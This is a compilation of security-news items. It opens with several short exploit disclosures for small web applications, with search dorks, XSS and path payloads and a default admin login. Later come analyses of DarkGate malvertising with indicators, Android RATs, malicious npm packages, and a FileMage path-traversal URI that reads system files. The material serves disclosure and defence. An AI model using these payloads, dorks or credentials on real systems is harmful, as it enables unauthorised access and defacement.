Forum Fire Soft Board version 0.3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Forum Fire Soft Board v0.3.0 XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://github.com/FSB                                                                                             || # Dork      : Forum Fire-Soft-Board © 2004 - 2014                                                                                |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use payload : index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=[+]  http://target_site/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Forum Fire Soft Board 0.3.0 Cross Site Scripting

Forma LMS version 1.4 suffers from a database disclosure vulnerability.

    ====================================================================================================================================| # Title     : Forma lms v1.4 Database Disclosure Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.formalms.org/                                                                                           || # Dork      : Copyright (c) forma.lms Powered by forma.lms CE                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Allow visitors to download the configuration file but without the database information.[+] http://127.0.0.1/icsgboscotarantogovit/forma/install/download_conf.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Forma LMS 1.4 Database Disclosure

Foodiee CMS version 1.0.1 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Foodiee CMS v1.0.1 Insecure Direct Object Reference Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             || # Vendor    : https://foodie.com.np/                                                                                             || # Dork      : "restaurants_details.php?id="                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference Allows full control of the website.[+] Use payload : /admin/dashboard.php[+] http://127.0.0.1/wwwmaulikbazarcom/admin/dashboard.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee CMS 1.0.1 Insecure Direct Object Reference

Foodiee Online Food Ordering Web Application version 1.0.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Foodiee - Online Food Ordering Web Application V1.0.0 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57                                  |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Backdoor Account : Username – admin@foodiee.com                           Password – 123456                   [+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee Online Food Ordering Web Application 1.0.0 Insecure Settings

FlightPath LMS version 4.8.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 XSS Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Cross Site Scripting

FixBook Repair Shop Management Tool version 3.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v3.0 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 3.0 Hash Disclosure

Categories: Threat Intelligence
Tags: darkgate

Tags: autoit

Tags: malvertising

Tags: seo poisoning

The new version of the DarkGate malware is currently actively being distributed via malspam, malicious ads and SEO poisoning.



(Read more...)




The post DarkGate reloaded via malvertising and SEO poisoning campaigns appeared first on Malwarebytes Labs.

In July 2023, we observed a malvertising campaign that lured potential victims to a fraudulent site for a Windows IT management tool. Unlike previous similar attacks, the final payload was packaged differently and not immediately recognizable.

The decoy file came as an MSI installer containing an AutoIT script where the payload was obfuscated to avoid detection. Upon analysis and comparison, we determined that this sample was an updated version of DarkGate, a multi purpose malware toolkit first identified in 2018. 

Since the malware's obfuscation and encryption features have been recently documented by other researchers, we will focus on two of its web delivery methods, namely the use of malicious ads and search engine poisoning.

The campaigns we observed coincide with an announcement from DarkGate's developer in June as well, boasting about the malware's new capabilities and limited customer seats.

**New DarkGate**

In its debut back in 2018 and later in 2020, DarkGate (also known as MehCrypter) was distributed via torrent sites and mostly focused on European victims and Spanish users in particular. The original blog post from enSilo (now Fortinet) also notes that its author may have been using email to spread malicious attachments.

In June 2023, a threat actor going by the handle RastaFarEye posted an advertisement in the XSS underground forum about a project known as DarkGate. As detailed by the ZeroFox Dark Ops intelligence team, the new version includes certain key features to evade detection while offering the expected credential stealing capabilities. The cost ($100K/year) and limited availability (10 customers) make DarkGate somewhat of an elusive toolkit.

Photo credit: ZeroFox Dark Ops intelligence team

Two blog posts came out in early August, identifying new DarkGate attacks:

*   Aon's Stroz Friedberg Incident Response Services details how they encountered a recent incident from a group similar to ScatteredSpider (UNC3944) that was using this new version of DarkGate.
*   Researcher 0xToxin wrote about phishing emails distributing a loader leading to DarkGate, with a complete technical analysis of the malware.

**Malvertising**

While investigating malvertising campaigns, we observed the following Google ad on on July 13, 2023:

Advanced IP Scanner is a popular tool used by IT administrators. Victims who click on the ad are presented with a decoy site:

The downloaded file (_Advanced\_IP\_Scanner\_2.5.4594.1.msi_) is an installer that contains the legitimate Advanced IP Scanner binary but also some extra files that are unpacked in the %temp% folder upon execution:

We recognize the familiar use of AutoIT which was already present in the very early versions of DarkGate.

Note: The same threat actor was also serving malicious ads via Bing as documented by Cyberuptive on August 8, 2023.

**SEO poisoning**

SEO poisoning is an old technique used by various threat actors and scammers who attempt to game search engines' ranking system. Although it takes a little more time to roll out, it is an effective way to trick users into visiting malicious sites.

The following search result appeared on Google:

The domain advancedscanner\[.\]link was created on 2023-07-28 and is used to redirect to the decoy page hosted at ipadvancedscanner\[.\]com. The downloaded file, IPAVSCAN\_win\_vers\_1.1.3.msi, also has the same AutoIt encrypted payload:

**Anti-VM and other checks**

We noticed that several of the newly registered domains associated with these campaigns had implemented advanced fingerprinting checks. We recently documented this trend which could soon become the norm due to its ease of use.

Here's another lure, this time for Angry IP Scanner, with a domain (ipangry\[.\]com registered 2023-07-29):

The payload, angry\_win\_0.47\_installer.msi and its AutoIt script:

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. They are also diversifying their delivery techniques by leveraging malspam, malvertising and SEO poisoning.

Malwarebytes' anti-malware engine detects this malware as Backdoor.DarkGate and our web protection blocks its known command and control servers.

Malwarebytes for Business (EDR) customers may also see the following alerts:

**Indicators of Compromise**

**Malvertising campaign**

top\[.\]advscan\[.\]com  
advanced-ips-scanne\[.\]com  
a4scan\[.\]com  
advanced-ip-scanne\[.\]com

**SEO poisoning campaign**

advancedscanner\[.\]link  
ipadvancedscanner\[.\]com  
185.224.137\[.\]54  
185.11.61\[.\]65

**DarkGate samples**

e5ca3a8732a4645de632d0a6edfaf064bdd34a4824102fbc2b328a974350db8f  
206042ec2b6bc377296c8b7901ce1a00c393df89e7c4cbbb1b8da1a86a153b67  
9a7db0204847d26515ed249f9ed577220326f63a724a2e0fb6bb1d8cd33508a3

**DarkGate C2s**

80.66.88\[.\]145  
107.181.161\[.\]200

**Additional resources**

*   0xToxin's payload decryptor
*   RussianPanda's DarkGate config extractor

DarkGate reloaded via malvertising and SEO poisoning campaigns

A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT.
"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.
CypherRAT and CraxsRAT are said to be offered to other cybercriminals as

Mobile Security / Cyber Crime

A Syrian threat actor named **EVLF** has been outed as the creator of malware families CypherRAT and CraxsRAT.

"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.

CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years.

EVLF is said to be operating a web shop to advertise their warez since at least September 2022.

CraxsRAT is billed as an Android trojan that enables a threat actor to remote control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers.

The malicious package is generated using a builder, which comes with options to customize and obfuscate the payload, choose an icon, the app name, and the features and permissions that need to be activated once installed on the smartphone.

"CraxsRAT is one of the most dangerous RATs in the current Android threat landscape, with impactful features such as Google Play protect bypass, live screen view, as well as a shell for command execution," Cyfirma explained.

"The 'Super Mod' feature renders the app more deadly still, making it hard for victims to uninstall the app (whenever the victim tries to uninstall, it crashes the page)."

The Android malware also requests victims to grant it permissions to Android's accessibility services, allowing it to harvest a wealth of information that would be valuable to cyber criminals, including call logs, contacts, external storage, location, and SMS messages.

EVLF has been observed operating a Telegram channel named "EvLF Devz" that was created on February 17, 2022. It has 10,678 subscribers as of writing.

A search for CraxsRAT surfaces numerous cracked versions of the malware hosted on GitHub, although it appears that Microsoft has taken down some of them over the past few days. The GitHub account of EVLF, however, remains active on the code-hosting service.

On August 23, 2023, EVLF posted a message on the channel saying they were hanging up the boots on the project, likely in response to the public disclosure of their activities.

"unfortunately this is the end , due to life circumstances i will stop developing and posting," EVLF said in the post. "for my customers don't worry , i will not let you and go , i will release couple of patch's for you before i go."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware

More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers.
The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API

Software Security / Malware

More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called **Luna Token Grabber** on systems belonging to Roblox developers.

The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API wrapper that's used to create scripts that interact with the Roblox gaming platform.

The software supply chain security company described the activity as a "replay of an attack uncovered two years ago" in October 2021.

"The malicious packages \[...\] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions," software threat researcher Lucija Valentić said in a Tuesday analysis.

The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows -

*   noblox.js-vps (versions 4.14.0 to 4.23.0)
*   noblox.js-ssh (versions 4.2.3 to 4.2.5)
*   noblox.js-secure (versions 4.1.0, 4.2.0 to 4.2.3)

While the broad contours of the latest attack wave remain similar to the previous one, it also exhibits some unique characteristics of its own, notably in the deployment of an executable that delivers Luna Grabber.

The development is one of the rare instances of a multi-stage infection sequence uncovered on npm, ReversingLabs said.

"With malicious campaigns that target the software supply chain, the difference between sophisticated and unsophisticated attacks often comes down to the level of effort the malicious actors make to disguise their attack and make their malicious packages look legitimate," Valentić pointed out.

The modules, in particular, cleverly conceal their malicious functionality in a separate file named postinstall.js that's invoked after installation.

That's because the genuine noblox.js package also employs a file with the same name to display a thank you message to its users alongside links to its documentation and GitHub repository.

The bogus variants, on the other hand, utilize the JavaScript file to verify to see if the package is installed on a Windows machine, and if so, download and execute a second-stage payload hosted on Discord CDN, or alternatively, show an error message.

ReversingLabs said that the second-stage continued to evolve with each iteration, progressively adding more functionality and obfuscation mechanisms to thwart analysis. The primary responsibility of the script is to download Luna Token Grabber, a Python tool that can siphon credentials from web browsers as well as Discord tokens.

However, it appears that the threat actor behind the npm campaign appears to have opted only to harvest system information from victims using a configurable builder made available by the author(s) behind Luna Token Grabber.

This is not the first time Luna Token Grabber has been spotted in the wild. Earlier this June, Trellix disclosed details of a new Go-based information stealer called Skuld that overlaps with the malware strain.

"It highlights yet again the trend of malicious actors using typosquatting as a technique to fool developers into downloading malicious code under the guise of similarly named, legitimate packages," Valentić said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over a Dozen Malicious npm Packages Target Roblox Game Developers

Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.

**Overview**

Hello all! Long time no see, I recently identified a vulnerability on FileMage Gateway that I applied for my first CVE.

On a recent security assesment, I identified a security vulnerability in FileMage Gateway. It is possible to send an unauthenticated HTTP(s) GET request to retrieve arbitrary files on the host system. This vulnerability is present and identified on the Azure Marketplace product.

**What is Filemage**

FileMage Gateway is an FTP/SFTP server backed by a cloud object storage API. Deployable from your cloud provider marketplace and billed hourly.

**Technical Details**

This section outlines the steps to replicate the exploitation of the identified vulnerability. I deployed an Azure Virtual Machine from the marketplace for the technical analysis. Additional reference material may be requested if needed.

By navigating to the homepage on FileMage Gateway, a path traversal vulnerability is present under the /mgmnt/ directory on the Azure Marketplace Deployment. An unauthenticated HTTPS GET request can be sent using dot-dot slash sequences using URL encoding as observed below.

    URI: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini
    

Deploying a test instance from the Azure Marketplace, process monitoring was leveraged to understand where the sensitive and configuration files are stored in FileMage.

It’s possible for an unauthenticated user to extract sensitive data such as FileMage and PostgresSQL configuration files, SSH keys, and other sensitive files as illustrated in the screenshots below.

This vulnerability was tested on non-azure deployments of FileMage but were found not to be vulnerable to the path traversal. I disclosed this vulnerability with the help of a great friend “Tylous”, thanks! This has since been patched.

**Recommendation**

User-controllable data should be strictly validated before being passed to any filesystem operations. In particular, input containing dot-dot sequences should be blocked. This was disclosed to the vendor

**Patched**

https://www.filemage.io/docs/updates.html - This was updated in 1.10.9 version of FileMage

**Next Steps**

While waiting on the CVE # to publish, I’ll publish the python POC code to exploit this and a nuclei template that I will try to merge with the nuclei-templates repo.

Tag

#windows